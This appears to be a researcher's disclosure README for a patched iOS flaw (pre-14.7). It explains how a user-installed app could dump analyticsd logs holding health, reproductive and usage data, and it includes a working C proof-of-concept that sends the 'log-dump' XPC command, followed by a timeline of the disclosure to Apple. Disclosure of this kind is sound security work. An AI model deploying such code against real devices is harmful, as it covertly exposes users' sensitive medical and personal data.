Analyticsd pre-14.7 exploit

I've updated this code to avoid using Private API directly. Read more in my blog post. However, that means that now this code is iOS version-specific and possibly device model-specific. So if it doesn't work on your device, recalculate and update the offsets in c.c file. The original code can be found in direct branch.

This vulnerability allows any user-installed app to access analytics logs (such as the ones that you can see in Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day... and Analytics-Daily...). These logs contain the following information (including, but not limited to):

  • medical information (heart rate, count of detected atrial fibrillation and irregular heart rythm events)
  • menstrual cycle length, biological sex and age, whether user is logging sexual activity, cervical mucus quality, etc.
  • device usage information (device pickups in different contexts, push notifications count and user's action, etc.)
  • screen time information and session count for all applications with their respective bundle IDs
  • information about device accessories with their manufacturer, model, firmware version and user-assigned names
  • application crashes with bundle IDs and exception codes
  • languages of web pages that user viewed in Safari

All this information is being collected by Apple for unknown purposes, which is quite disturbing, especially the fact that medical information is being collected. That's why it's very hypocritical of Apple to claim that they deeply care about privacy. All this data was being collected and available to an attacker even if "Share analytics" was turned off in settings.

const char * analytics_json(void) {
    xpc_connection_t connection = xpc_connection_create_mach_service("com.apple.analyticsd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
    xpc_connection_set_event_handler(connection, (^(xpc_object_t object){}));
    xpc_connection_resume(connection);
    xpc_object_t xdict = xpc_dictionary_create(0, 0, 0);
    xpc_dictionary_set_string(xdict, "command", "log-dump");
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(connection, xdict);
    return xpc_dictionary_get_string(reply, "log-dump");
}

Timeline:

April 29 2021 - I sent a detailed report to Apple

April 30 2021 - Apple replied that they had reviewed the report and are investigated

May 20 2021 - I've requested a status update from Apple (and recieved no reply)

May 30 2021 - I've requested a status update from Apple

June 3 2021 - Apple replied that they plan to address the issue in the upcoming update

July 19 2021 - iOS 14.7 is released with the fix

July 20 2021 - I've requested a status update from Apple

July 21 2021 - iOS 14.7 security contents list is published, this vulnerability is not mentioned (https://support.apple.com/en-us/HT212601)

July 22 2021 - I've asked Apple a question why the vulnerability is not on the list

Same day I receive the following reply: **Due to a processing issue, your credit will be included on the security advisories in an upcoming update. We apologize for the inconvenience. **

July 26 2021 - iOS 14.7.1 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212623)

September 13 2021 - iOS 14.8 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212807) Same day I asked for an explanation and informed Apple that I would make all my reasearch public unless I receive a reply soon.

September 20 2021 - iOS 15.0 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212814)

September 24 2021 - I still haven't received any reply